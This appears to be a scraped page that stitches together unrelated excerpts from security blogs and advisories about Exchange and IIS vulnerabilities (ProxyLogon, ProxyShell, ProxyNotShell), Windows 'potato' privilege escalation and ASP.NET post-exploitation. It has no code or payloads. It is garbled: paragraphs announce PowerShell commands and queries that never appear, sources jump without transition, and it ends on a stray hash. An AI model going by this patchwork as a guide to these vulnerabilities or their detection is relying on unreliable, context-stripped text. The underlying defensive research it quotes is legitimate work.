Further investigation shows that only 60,000 public-facing IIS 6.0 servers have WebDAV enabled along with a header called PROPFIND that's necessary for successful exploitation, writes an infosec researcher, Iraklis Mathiopoulos. He cautioned the figure was a rough calculation.
Three of the top 15 routinely exploited vulnerabilities were also routinely exploited in 2020: CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors.
Guide to IIS Exploitation
Microsoft has yet to release a patch for these vulnerabilities. In the meantime, they provided mitigations that rely on the usage of a URL Rewrite rule to identify and block exploitation attempts as well as disabling remote PowerShell access for non-admins.
GTSC provided the same guidance in their blog as well. If you feel you may have been targeted and keep IIS logs, GTSC recommends running the following PowerShell command to search for evidence of attempted exploitation of your Exchange servers:
Cortex XDR customers can search for signs of exploitation by employing the queries included in the following section of this brief. The queries include evidence of certutil connections to public IPs, evidence of DLL and EXE writes to C:\Users\Public\, evidence of China Chopper webshell activity, and the addition of suspicious files to Exchange directories.
The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit these CVEs across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.
Along with a complete breakdown of the newly discovered families, our new paper, Anatomy of native IIS malware, provides a comprehensive guide to help fellow security researchers and defenders detect, dissect and mitigate this class of server-side threats. In this blogpost, we summarize the findings of the white paper.
While IIS server threats are not limited to native IIS malware, we believe this paper will be a helpful starting point for defenders for understanding, identifying, and removing IIS threats, and a guide to our fellow researchers to reverse engineer this class of threats and understand their common tactics, techniques and procedures.
Hot, Rotten, Lonely, Juicy, Rogue, Sweet, Generic potatoes. There are a lot of different potatoes used to escalate privileges from Windows Service Accounts to NT AUTHORITY/SYSTEM. But, what are the differences? When should I use each one? Do they still work? This post is a summary of each kind of potato, when to use it and how to achieve successful exploitation.
Checking other logs, they saw that the attacker can execute commands on the attacked system. The version number of these Exchange servers showed that the latest update had already installed, so an exploitation using Proxyshell vulnerability was impossible.
The easy exploitation mechanism was known publicly after Alvaro Muñoz & Oleksandr Mirosh published their gadgets in BlackHat 2017 [26]. It was then possible to use the YSoSerial.Net project [12] to create the LosFormatter class payloads.
In the first article in the series, we will take a brief look at the MS Exchange server architecture and move on to the most relevant topic for everyone, i.e. detecting the exploitation of ProxyLogon. We will show how to use standard operating system events and Exchange logs to detect ProxyLogon, both in real time, using proactive threat hunting approaches, and attacks that have already happened in the past.
Let us take a closer look at the ProxyLogon vulnerability chain. CVE-2021-26857 is not actually part of this chain, as it leads to code execution on the server and does not require other vulnerabilities to be exploited beforehand. Vulnerability CVE-2021-26857 is related to insecure data deserialisation in the Unified Messaging service. Exploiting this vulnerability requires that the Unified Messaging role be installed and configured on the Exchange server. As this role is rarely used, no exploitation of this vulnerability has been reported so far. Instead, attackers exploit the CVE-2021-26855, CVE-2021-26858 and CVE-2021-27065 vulnerability chain, which also allows remote arbitrary code execution on the mail server but is easier to exploit.
Successful exploitation of CVE-2021-27065 allows a malicious file to be uploaded to an Exchange server using the ECP interface, which can then be used as a web shell. Exploitation of this vulnerability requires pre-authentication, which can be performed using CVE-2021-26855. Let us take a closer look at the exploitation of CVE-2021-27065.
The CVE-2021-26858 vulnerability also allows writing an arbitrary file to an Exchange server, but requires pre-authentication for successful exploitation. This vulnerability can also be used in conjunction with SSRF (CVE-2021-26858).
There are no publicly available PoCs or other sources detailing its exploitation. Nevertheless, Microsoft has reported how this activity can be detected. To do so, we implement the following rule using events from the OAB Generator service:
Even if the servers are already patched it is worth checking them for signs of ProxyLogon exploitation and repair the consequences if needed. This is quite easy to do with the standard operating system and Exchange server log events at hand.
This guide only addresses the investigation and mitigation of incidents involving Squirrelwaffle detected on the network. If additional internal lateral movement is detected as a result of unmitigated web shells or other exploitation of the ProxyLogon or ProxyShell vulnerabilities, we recommend a full Incident Response action.
The queries and commands referenced in the guide are some of the methods used by the Sophos Rapid Response team during incident engagements. They are recommendations only, there will be other ways of accomplishing each task.
Patching Exchange will protect it from any further attempts to exploit ProxyShell. However, if it has already been exploited, malware may still exist on the server and provide an attacker with remote access. The next step is to look for signs of previous exploitation of Exchange.
The results show the Mailbox Export requests still in the queue, as well as lingering unauthorized Import Export roles, which can allow previously removed web shells from ProxyShell and ProxyLogon exploitation to be recreated.
Picus Labs added new attack simulations for ProxyNotShell vulnerability exploitation attacks to Picus Threat Library. In this blog, we explain CVE-2022-41040 and CVE-2022-41082 vulnerabilities in detail.
Security professionals discovered these vulnerabilities after their successful exploitation in the wild. The log data shows that adversaries used the same format ProxyShell exploitation in 2021 in their exploit attempts.
We also strongly suggest simulating ProxyNotShell attacks to test the effectiveness of your security controls against vulnerability exploitation attacks using the Picus Complete Security Validation Platform. You can test your defenses against ProxyShell, Log4Shell, and hundreds of other vulnerabilities within minutes with a 14-day free trial of the Picus Platform.
Moreover, Picus Threat Library contains 150+ threats containing 1500+ web application and vulnerability exploitation attacks in addition to 3500+ endpoint, malware, email, and data exfiltration threats as of today.
A patch for CVE-2022-37958 was originally released by Microsoft in September 2022 and remains the supported and recommended solution, despite recent findings by IBM Security X-Force and reclassification by Microsoft: -guide/vulnerability/CVE-2022-37958
On Tuesday evening (UTC), a Proof-of-Concept (PoC) video surfaced on Twitter ( =20&t=Bwn3jV5oeB4kqamoFxptKQ) from a X-Force Security Researcher, showing what appears to be successful exploitation of CVE-2022-37958 against a Windows 10 system, causing a crash of the LSA Service.
The CFC is creating a threat hunt campaign designed to identify successful exploitation of this vulnerability, using internal queries and methodology resourced from Incident Response engagements where similar activity was observed.
Note: For my own sanity, I have intentionally decided to omit references to ASP.NET 5 (or ASP.NET Core 1.0, or whatever the heck you want to call it). It is just too dramatically different, and if anything, it probably makes sense to write a whole other guide for it later. From this point forward, we are only talking about .NET 4.x and below.
The goal of this post is to provide a resource for pentesters covering multiple aspects of practical exploitation ASP.NET cryptography. I want to highlight the increased risk that ASP.NET applications face, due to immutable design characteristics of the platform relating to cryptographic functionality.
These techniques are all considered post-exploitation techniques. That is to say, they require some pre-existing violation of the security of an ASP.NET application, whether that is an arbitrary file read, a pre-existing remote code execution (RCE) vulnerability, a public information leak, or even the compromise of a totally separate application.
This short-circuits all of the complicated inner machinery being used to convert the basekey stored in the registry to the effective key and greatly simplifies the process. While incredibly handy, this does assume that you are in the post-exploitation context and therefore already have compromised the server and have access to add .aspx files.
The aspnet_regiis utility (located in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\) can be used to encrypt / decrypt sections of the web.config. Again, this is only useful in a post-exploitation scenario where you already have local admin access on the server.
According to the Praetorian post confirming the presence of anRCE in Spring Core, the currently recommended approach for is to patch DataBinder by adding a blacklist of vulnerablefield patterns required for exploitation. 2ff7e9595c
Comments